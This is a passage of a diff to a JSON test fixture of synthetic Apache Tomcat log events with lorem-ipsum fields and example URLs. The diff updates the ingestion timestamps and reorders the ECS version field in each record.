Mobile Safari/537.36||elites", "event": { - "ingested": "2021-06-09T13:32:47.950483400Z" + "ingested": "2021-12-14T14:58:59.365403368Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-1952-MKCOL: 10.168.6.90||rem||amvolupt||[11/Jul/2017:2:45:07 GMT+02:00]||atisund||https://example.net/ites/isetq.gif?nisiut=tur#avolupt||ariatur||rer||iconseq||porincid||6941||https://mail.example.org/nofd/dipisci.txt?ilmol=eri#quunt||Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80||tae", "event": { - "ingested": "2021-06-09T13:32:47.950488200Z" + "ingested": "2021-12-14T14:58:59.365403761Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-7717-rndmmtd: 10.89.137.238||plica||ore||[25/Jul/2017:9:47:41 OMST]||emqu||https://mail.example.com/acommod/itsedd.html?admin=stenatu#inibu||est||uptatemU||leumiu||tla||4765||https://api.example.org/isa/niamqui.jpg?dqu=pid#rExc||Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61||erun", "event": { - "ingested": "2021-06-09T13:32:47.950493Z" + "ingested": "2021-12-14T14:58:59.365404146Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4574-OPTIONS: 10.246.61.213||ntutlabo||iusmodte||[08/Aug/2017:4:50:15 CT]||loi||https://example.org/Nequepor/eirure.htm?idid=tesse#sequat||giatquov||tconsec||miurerep||toccaec||7645||https://www5.example.net/psaqua/ullamcor.txt?qui=cupi#tame||Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36||orroq", "event": { - "ingested": "2021-06-09T13:32:47.950498100Z" + "ingested": "2021-12-14T14:58:59.365404609Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 22 23:52:50 orin5238.host %APACHETOMCAT- MKCOL: 10.117.44.138||orem||rcit||[22/Aug/2017:11:52:50 PST]||enderit||https://www.example.org/tanimi/rumSecti.jpg?emporain=ntiumto#umetMalo||oluptas||emvele||isnost||olorem||2760||https://www5.example.net/quunt/acommod.jpg?sit=rumSect#ita||Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36||aliq", "event": { - "ingested": "2021-06-09T13:32:47.950503Z" + "ingested": "2021-12-14T14:58:59.365404999Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4801-PRONECT: 10.69.30.196||tore||elits||[06/Sep/2017:6:55:24 OMST]||ruredo||https://example.net/temUt/ptassita.gif?uamnihi=risnis#uov||itlab||urmag||omm||equ||4808||https://www.example.net/siuta/urmagn.html?uptat=idex#ptateve||Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16||nimveni", "event": { - "ingested": "2021-06-09T13:32:47.950507900Z" + "ingested": "2021-12-14T14:58:59.365405388Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-7668-BADMTHD: 10.135.91.88||ercit||eporroq||[20/Sep/2017:1:57:58 CT]||ugiatn||https://api.example.com/dictasun/abore.txt?modocon=ipsu#ntNeq||tate||urExce||asi||ectiono||2241||https://example.org/onu/liquaUte.txt?velillu=ria#atDu||Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||emq", "event": { - "ingested": "2021-06-09T13:32:47.950512900Z" + "ingested": "2021-12-14T14:58:59.365405778Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 4 21:00:32 agnaaliq1829.mail.test %APACHETOMCAT- ABCD: 10.81.45.174||tin||fugitse||[04/Oct/2017:9:00:32 CEST]||liquide||https://example.net/Sedutpe/prehen.html?rcit=aecatcup#olabor||estl||erun||iruredol||incidid||7699||https://api.example.org/edquian/loremeu.gif?volupta=dmi#untexpl||Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||mipsamvo", "event": { - "ingested": "2021-06-09T13:32:47.950517800Z" + "ingested": "2021-12-14T14:58:59.365406160Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-3517-rndmmtd: 10.87.179.233||mnisiut||avolu||[19/Oct/2017:4:03:07 PST]||eum||https://www.example.org/umetMal/asper.htm?metcons=itasper#uae||mve||uia||iciad||lorem||6137||https://www.example.org/redol/gnaa.htm?aliquamq=dtempori#toditaut||Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||dexerc", "event": { - "ingested": "2021-06-09T13:32:47.950523200Z" + "ingested": "2021-12-14T14:58:59.365406577Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-2669-COOK: 10.198.57.130||hitec||henderit||[02/Nov/2017:11:05:41 OMST]||perspici||https://api.example.net/mquisn/queips.gif?emUte=molestia#quir||eavolup||emip||ver||erc||294||https://example.com/iuntNequ/esseq.txt?remq=veniamq#occ||Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90||emo", "event": { - "ingested": "2021-06-09T13:32:47.950571400Z" + "ingested": "2021-12-14T14:58:59.365406960Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-494-GET: 10.218.0.197||dolor||econs||[16/Nov/2017:6:08:15 ET]||eritin||https://www.example.net/yCic/nder.jpg?itanim=nesciun#saqu||iscive||quasiar||aeab||teur||609||https://www.example.org/mol/tur.jpg?usmodi=ree#saquaea||Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||eetd", "event": { - "ingested": "2021-06-09T13:32:47.950581200Z" + "ingested": "2021-12-14T14:58:59.365407350Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 1 01:10:49 iatqu7310.api.home %APACHETOMCAT- get: 10.123.199.198||irured||illumqui||[01/Dec/2017:1:10:49 PST]||tionula||https://mail.example.com/ecatcupi/uamei.html?nreprehe=onse#olorem||turvel||eratv||ipsa||asuntexp||1390||https://example.com/oremquel/lmole.jpg?boNem=iumt#tsed||Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36||mpo", "event": { - "ingested": "2021-06-09T13:32:47.950587600Z" + "ingested": "2021-12-14T14:58:59.365407737Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 15 08:13:24 uamnihil6127.api.domain %APACHETOMCAT- POST: 10.29.119.245||tatnon||leumiur||[15/Dec/2017:8:13:24 ET]||ore||https://internal.example.net/ection/roquisqu.html?ceroinB=nim#utaliqu||rsi||taliqui||mides||ciun||39||https://example.org/iatqu/inBCSedu.gif?urExcep=ema#suntex||Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36||anim", "event": { - "ingested": "2021-06-09T13:32:47.950593300Z" + "ingested": "2021-12-14T14:58:59.365408466Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 29 15:15:58 uov1629.internal.invalid %APACHETOMCAT- DETECT_METHOD_TYPE: 10.130.175.17||quide||quaU||[29/Dec/2017:3:15:58 PT]||inimav||https://mail.example.net/iutali/itat.txt?Finibus=radi#xeacom||des||atnulapa||billo||rroqu||2170||https://www.example.org/taedi/tquido.html?etconsec=elillum#upt||Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||onsectet", "event": { - "ingested": "2021-06-09T13:32:47.950599100Z" + "ingested": "2021-12-14T14:58:59.365408868Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-5752-PROPFIND: 10.166.90.130||mdolore||eosquira||[12/Jan/2018:10:18:32 CET]||lloinven||https://mail.example.net/lmolesti/apariatu.htm?moe=msequ#uat||lupta||npr||etconsec||caboNem||1043||https://internal.example.org/litesseq/atcupida.html?tob=dolores#equamnih||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||deF", "event": { - "ingested": "2021-06-09T13:32:47.950604400Z" + "ingested": "2021-12-14T14:58:59.365409343Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 27 05:21:06 orumw5960.www5.home %APACHETOMCAT- GET: 10.248.111.207||dolor||tiumto||[27/Jan/2018:5:21:06 GMT-07:00]||quiavol||https://api.example.org/ratv/alorum.jpg?tali=BCS#qui||ugiatquo||incidid||quin||autemv||6174||https://internal.example.org/mipsumqu/tatio.jpg?admi=onnu#olorema||Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||atatnon", "event": { - "ingested": "2021-06-09T13:32:47.950609500Z" + "ingested": "2021-12-14T14:58:59.365409726Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-2940-asdf: 10.185.37.32||ame||tesseq||[10/Feb/2018:12:23:41 GMT+02:00]||tem||https://internal.example.net/gitse/ugitse.jpg?tvolup=tdolore#ventore||red||sinto||tatev||luptas||3286||https://api.example.net/aev/inrepr.gif?iadese=nisiu#imad||Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91||ptatem", "event": { - "ingested": "2021-06-09T13:32:47.950614500Z" + "ingested": "2021-12-14T14:58:59.365410134Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4927-SEARCH: 10.5.194.202||onproide||ntmo||[24/Feb/2018:7:26:15 CET]||riosa||https://example.org/pisc/urEx.html?rautod=olest#eataev||atcupi||atem||qui||otamr||7278||https://internal.example.com/meaque/uid.htm?tion=tobeatae#maccusa||Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||iqua", "event": { - "ingested": "2021-06-09T13:32:47.950619600Z" + "ingested": "2021-12-14T14:58:59.365410526Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 11 02:28:49 deriti6952.mail.domain %APACHETOMCAT- PRONECT: 10.183.34.1||boree||isn||[11/Mar/2018:2:28:49 CEST]||der||https://www5.example.com/aconse/prehe.gif?diduntu=eiusmod#itation||veleum||piciatis||nes||lmolesti||1559||https://www.example.org/emaperia/Section.txt?iame=orroquis#aquio||Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30||ntmoll", "event": { - "ingested": "2021-06-09T13:32:47.950624500Z" + "ingested": "2021-12-14T14:58:59.365410910Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4472-CFYZ: 10.101.163.40||abor||nBCSe||[25/Mar/2018:9:31:24 CEST]||remips||https://mail.example.net/reetdolo/rationev.html?reetdol=uelauda#ema||odi||ptatems||runtmo||ore||3512||https://internal.example.com/undeom/emullamc.jpg?quaer=eetdo#tlab||Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36||liq", "event": { - "ingested": "2021-06-09T13:32:47.950629800Z" + "ingested": "2021-12-14T14:58:59.365411299Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 8 16:33:58 nse3421.mail.localhost %APACHETOMCAT- uGET: 10.216.188.152||oremi||ugitsedq||[08/Apr/2018:4:33:58 ET]||atDuis||https://www5.example.com/mUteni/quira.htm?ore=tation#loinve||tatevel||iumdolo||untu||ict||2699||https://internal.example.com/riosamni/icta.gif?umetMa=imadmin#iqui||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||Nequepo", "event": { - "ingested": "2021-06-09T13:32:47.950634900Z" + "ingested": "2021-12-14T14:58:59.365411686Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-1033-nGET: 10.94.140.77||veniam||isnisiu||[22/Apr/2018:11:36:32 OMST]||dol||https://www5.example.org/setquas/minim.gif?tutlabor=reseosq#gna||isiutali||lumqu||onulamco||ons||5050||https://mail.example.net/unt/tass.html?tla=mquiad#CSe||Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16||psa", "event": { - "ingested": "2021-06-09T13:32:47.950639700Z" + "ingested": "2021-12-14T14:58:59.365412068Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4133-PUT: 10.223.205.204||lor||ccaec||[07/May/2018:6:39:06 PST]||ommo||https://www.example.com/laudanti/umiurer.txt?rsitvolu=mnisi#usmo||iamea||imaveni||uiacon||iam||7526||https://mail.example.org/oin/itseddoe.html?citati=uamei#eursinto||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||tutla", "event": { - "ingested": "2021-06-09T13:32:47.950644400Z" + "ingested": "2021-12-14T14:58:59.365412471Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 21 13:41:41 tautfug689.localdomain %APACHETOMCAT- PUT: 10.85.137.156||atiset||serror||[21/May/2018:1:41:41 CEST]||isiut||https://mail.example.org/ici/nisiuta.jpg?itae=dtempo#atnula||ditautf||itametc||ori||uamqu||2804||https://example.com/quiac/sunt.gif?etdol=dolorsi#nturmag||Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||Except", "event": { - "ingested": "2021-06-09T13:32:47.950649300Z" + "ingested": "2021-12-14T14:58:59.365412865Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 4 20:44:15 totam6886.api.localhost %APACHETOMCAT- QUALYS: 10.12.54.142||trudex||liquam||[04/Jun/2018:8:44:15 PST]||lor||https://mail.example.com/eseruntm/lpaquiof.html?magnaal=uscip#umS||iciadese||riatur||oeni||dol||3000||https://www5.example.net/teturadi/ditau.gif?piscivel=hend#eacommo||Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||aer", "event": { - "ingested": "2021-06-09T13:32:47.950654400Z" + "ingested": "2021-12-14T14:58:59.365413257Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-3864-RNDMMTD: 10.158.6.52||dolorem||sed||[19/Jun/2018:3:46:49 OMST]||Nemoenim||https://example.net/labori/porai.gif?utali=sed#xeac||umdolors||lumdo||acom||eFini||4262||https://internal.example.org/uovol/prehend.html?eque=eufug#est||Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g||ntincul", "event": { - "ingested": "2021-06-09T13:32:47.950659700Z" + "ingested": "2021-12-14T14:58:59.365413635Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 3 10:49:23 tquo854.api.domain %APACHETOMCAT- MKCOL: 10.195.160.182||ine||urerepre||[03/Jul/2018:10:49:23 CT]||itessequ||https://www5.example.org/orissu/fic.gif?ese=mmodoco#amni||atnul||umfugi||stquidol||Nemoenim||1325||https://example.com/tasnul/tuserr.jpg?amvo=tnul#expl||Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||isau", "event": { - "ingested": "2021-06-09T13:32:47.950664800Z" + "ingested": "2021-12-14T14:58:59.365414021Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-6084-CONNECT: 10.20.68.117||rQuisaut||quas||[17/Jul/2018:5:51:58 ET]||metco||https://mail.example.com/iuntNeq/eddoei.jpg?sseq=eriam#pernat||udan||archi||iutaliq||urQuis||1742||https://example.net/orum/Bonoru.txt?agnamal=quei#quio||Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||lamcola", "event": { - "ingested": "2021-06-09T13:32:47.950669500Z" + "ingested": "2021-12-14T14:58:59.365414413Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 1 00:54:32 venia6656.api.domain %APACHETOMCAT- CONNECT: 10.94.136.235||mmod||iti||[01/Aug/2018:12:54:32 PST]||amqu||https://www5.example.com/tanimid/onpr.gif?gelitse=oremqu#idex||radip||upta||tetura||rumet||6923||https://www5.example.org/lestia/nde.jpg?pisci=sunt#texplica||Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30||ore", "event": { - "ingested": "2021-06-09T13:32:47.950674400Z" + "ingested": "2021-12-14T14:58:59.365414802Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 15 07:57:06 veniam1216.www5.invalid %APACHETOMCAT- NCIRCLE: 10.152.11.26||expli||ugiat||[15/Aug/2018:7:57:06 GMT+02:00]||oinBCSed||https://www.example.net/ntorever/pisciv.gif?eritq=rehen#ipsamvol||elillum||veleumi||nsequatu||nula||2783||https://example.com/santi/ritati.gif?turadip=dip#idolo||Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10||aco", "event": { - "ingested": "2021-06-09T13:32:47.950679300Z" + "ingested": "2021-12-14T14:58:59.365415189Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 29 14:59:40 runtm5729.invalid %APACHETOMCAT- PRONECT: 10.82.118.95||bore||ptate||[29/Aug/2018:2:59:40 GMT+02:00]||labo||https://www5.example.com/quu/xeac.htm?abor=oreverit#scip||Finibus||Utenimad||olupta||tau||5211||https://www5.example.com/itametco/vel.htm?rere=pta#nonn||Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61||met", "event": { - "ingested": "2021-06-09T13:32:47.950684300Z" + "ingested": "2021-12-14T14:58:59.365415577Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4322-id: 10.187.152.213||conse||ventor||[12/Sep/2018:10:02:15 CEST]||mag||https://www.example.net/mini/Loremip.html?tur=atnonpr#ita||amquaer||aqui||enby||lpa||3948||https://www5.example.net/iat/ffic.htm?cte=aparia#CSe||Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36||ugitsedq", "event": { - "ingested": "2021-06-09T13:32:47.950720800Z" + "ingested": "2021-12-14T14:58:59.365415965Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 27 05:04:49 pta6012.www.local %APACHETOMCAT- uGET: 10.98.71.45||destla||fugitse||[27/Sep/2018:5:04:49 GMT+02:00]||eirur||https://www.example.net/duntutla/lamco.txt?isci=Dui#reetdo||ever||civelits||eos||ipitlabo||5440||https://internal.example.net/nonn/hite.htm?ariatur=labo#sautei||Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36||unt", "event": { - "ingested": "2021-06-09T13:32:47.950727600Z" + "ingested": "2021-12-14T14:58:59.365416355Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-5971-uGET: 10.86.123.33||ugia||meum||[11/Oct/2018:12:07:23 OMST]||doei||https://www5.example.net/tev/nre.html?occaeca=eturadip#ent||rumSecti||Utenima||olore||orumS||757||https://www5.example.org/eursint/orio.txt?iameaqu=aaliquaU#olu||Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g||yCiceroi", "event": { - "ingested": "2021-06-09T13:32:47.950733500Z" + "ingested": "2021-12-14T14:58:59.365416745Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-2852-FGET: 10.6.112.183||deom||oluptat||[25/Oct/2018:7:09:57 GMT-07:00]||eni||https://www5.example.net/uamnih/nseq.txt?uidolo=umdolore#dmi||tam||oremip||eufugi||dunt||6169||https://api.example.net/uidexeac/sequa.html?modoc=magnam#uinesc||Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||idatat", "event": { - "ingested": "2021-06-09T13:32:47.950739200Z" + "ingested": "2021-12-14T14:58:59.365417198Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 9 02:12:32 orsi2109.internal.home %APACHETOMCAT- LOCK: 10.227.156.143||sis||idolo||[09/Nov/2018:2:12:32 CEST]||tsedquia||https://example.net/umdolor/isiu.html?mmodi=snostr#eniamqu||inimav||tatevel||midestl||nci||6587||https://www5.example.org/nvolupt/meiusm.htm?aturv=ectetura#obeataev||Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10||seq", "event": { - "ingested": "2021-06-09T13:32:47.950745Z" + "ingested": "2021-12-14T14:58:59.365417581Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 23 09:15:06 quaeabil2539.www5.lan %APACHETOMCAT- get: 10.124.129.248||iamqui||quide||[23/Nov/2018:9:15:06 CT]||cididun||https://example.org/ibusBo/untincu.jpg?lesti=sintocca#mipsumqu||eprehen||hilmole||sequ||sectetu||7182||https://example.net/dolor/lorumwri.htm?mquis=lab#uido||Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||mwrit", "event": { - "ingested": "2021-06-09T13:32:47.950750500Z" + "ingested": "2021-12-14T14:58:59.365417966Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 7 16:17:40 aal1598.mail.host %APACHETOMCAT- CONNECT: 10.173.125.112||quiavolu||upta||[07/Dec/2018:4:17:40 OMST]||umtota||https://www5.example.org/magnaa/sumquiad.gif?oluptate=Duisa#consequa||eaqueip||itaedict||olorema||rep||3380||https://www5.example.net/siarc/fdeFin.jpg?tobeata=nesciun#amcolab||Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||isnisiut", "event": { - "ingested": "2021-06-09T13:32:47.950755700Z" + "ingested": "2021-12-14T14:58:59.365418346Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-5227-GET: 10.37.156.140||uisnos||olores||[21/Dec/2018:11:20:14 PST]||epo||https://www.example.org/evolup/rvelil.gif?eavolup=ipsumq#evit||tno||iss||taspe||lum||5911||https://api.example.net/eturad/tDuis.htm?enimadmi=tateveli#osa||Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16||idolorem", "event": { - "ingested": "2021-06-09T13:32:47.950762Z" + "ingested": "2021-12-14T14:58:59.365418864Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-5776-PRONECT: 10.121.225.135||ufugi||cin||[05/Jan/2019:6:22:49 ET]||byC||https://example.com/oremip/its.jpg?iavol=natuserr#ostrudex||nse||miurere||evit||uatu||2448||https://www5.example.org/uamestqu/mpor.jpg?hender=ptatemU#seq||Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61||tnulapa", "event": { - "ingested": "2021-06-09T13:32:47.950767300Z" + "ingested": "2021-12-14T14:58:59.365419269Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-7708-DEBUG: 10.123.68.56||expl||olore||[19/Jan/2019:1:25:23 CEST]||dentsunt||https://www.example.org/animid/upta.jpg?onnumqua=quioff#iuntN||ipis||itautfu||nesci||tam||1206||https://mail.example.net/tetura/eeufug.txt?modt=iduntutl#rsitam||Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36||ntor", "event": { - "ingested": "2021-06-09T13:32:47.950772500Z" + "ingested": "2021-12-14T14:58:59.365419646Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": 